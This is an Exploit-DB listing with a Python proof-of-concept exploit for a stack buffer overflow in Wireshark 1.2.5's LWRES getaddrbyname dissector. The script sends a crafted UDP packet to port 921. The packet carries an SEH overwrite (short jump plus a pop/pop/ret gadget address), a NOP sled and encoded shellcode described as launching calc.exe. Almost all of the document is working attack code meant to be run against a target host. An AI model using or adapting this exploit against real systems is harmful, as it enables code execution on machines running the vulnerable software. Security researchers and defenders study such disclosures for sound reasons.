Wireshark 1.2.5 LWRES getaddrbyname BOF - calc.exe



EDB-ID: 11453 CVE: N/A OSVDB-ID: N/A
Author: Nullthreat and Pure|Hate Published: 2010-02-15 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(5.0)
Screenshot
Prev Home Next
#!/usr/bin/env python
# Wireshark 1.2.5 LWRES getaddrbyname stack-based buffer overflow
# Discovered by babi
# Reference: http://www.exploit-db.com/exploits/11288
# Exploit Dev by Nullthreat & Pure|Hate

import socket, sys

try:
  host = sys.argv[1]
except:
  print "usage: " + sys.argv[0] + " <host>"
  exit(2)

port = 921
addr = (host, port)

leng = 9150
high = int(leng / 256)
low = leng & 255

crash = ("A" * 2128)

# Short jump
jmp = "\x90\x90\x06\xeb"

# pop/pop/ret in pcre3 0x61b4121b
ppr = "\x1b\x12\xb4\x61"

nop  = ("\x90" * 24)

# 224 bytes = calc.exe
shellcode = (
"\xbf\x86\x0a\x33\xa0\x2b\xc9\xda\xd9\xd9\x74\x24\xf4\xb1"
"\x32\x5e\x31\x7e\x11\x03\x7e\x11\x83\xc6\x82\xe8\xc6\x5c"
"\x62\x65\x28\x9d\x72\x16\xa0\x78\x43\x04\xd6\x09\xf1\x98"
"\x9c\x5c\xf9\x53\xf0\x74\x8a\x16\xdd\x7b\x3b\x9c\x3b\xb5"
"\xbc\x10\x84\x19\x7e\x32\x78\x60\x52\x94\x41\xab\xa7\xd5"
"\x86\xd6\x47\x87\x5f\x9c\xf5\x38\xeb\xe0\xc5\x39\x3b\x6f"
"\x75\x42\x3e\xb0\x01\xf8\x41\xe1\xb9\x77\x09\x19\xb2\xd0"
"\xaa\x18\x17\x03\x96\x53\x1c\xf0\x6c\x62\xf4\xc8\x8d\x54"
"\x38\x86\xb3\x58\xb5\xd6\xf4\x5f\x25\xad\x0e\x9c\xd8\xb6"
"\xd4\xde\x06\x32\xc9\x79\xcd\xe4\x29\x7b\x02\x72\xb9\x77"
"\xef\xf0\xe5\x9b\xee\xd5\x9d\xa0\x7b\xd8\x71\x21\x3f\xff"
"\x55\x69\xe4\x9e\xcc\xd7\x4b\x9e\x0f\xbf\x34\x3a\x5b\x52"
"\x21\x3c\x06\x39\xb4\xcc\x3c\x04\xb6\xce\x3e\x27\xde\xff"
"\xb5\xa8\x99\xff\x1f\x8d\x55\x4a\x3d\xa4\xfd\x13\xd7\xf4"
"\x60\xa4\x0d\x3a\x9c\x27\xa4\xc3\x5b\x37\xcd\xc6\x20\xff"
"\x3d\xbb\x39\x6a\x42\x68\x3a\xbf\x21\xef\xa8\x23\xa6\xe5"
)

crash2 = ("\xcc" * 6752)

data  = "\x00\x00\x01\x5d\x00\x00\x00\x00\x4b\x49\x1c\x52\x00\x01\x00\x01"
data += "\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00"
data += "\x00\x00\x00\x01"
data += chr(high) + chr(low) + crash + jmp + ppr + nop  + shellcode + crash2 + "\x00\x00"

udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
  udps.sendto(data, addr)
except:
  print "can't lookup host"
  exit(1)

udps.close()
exit(0)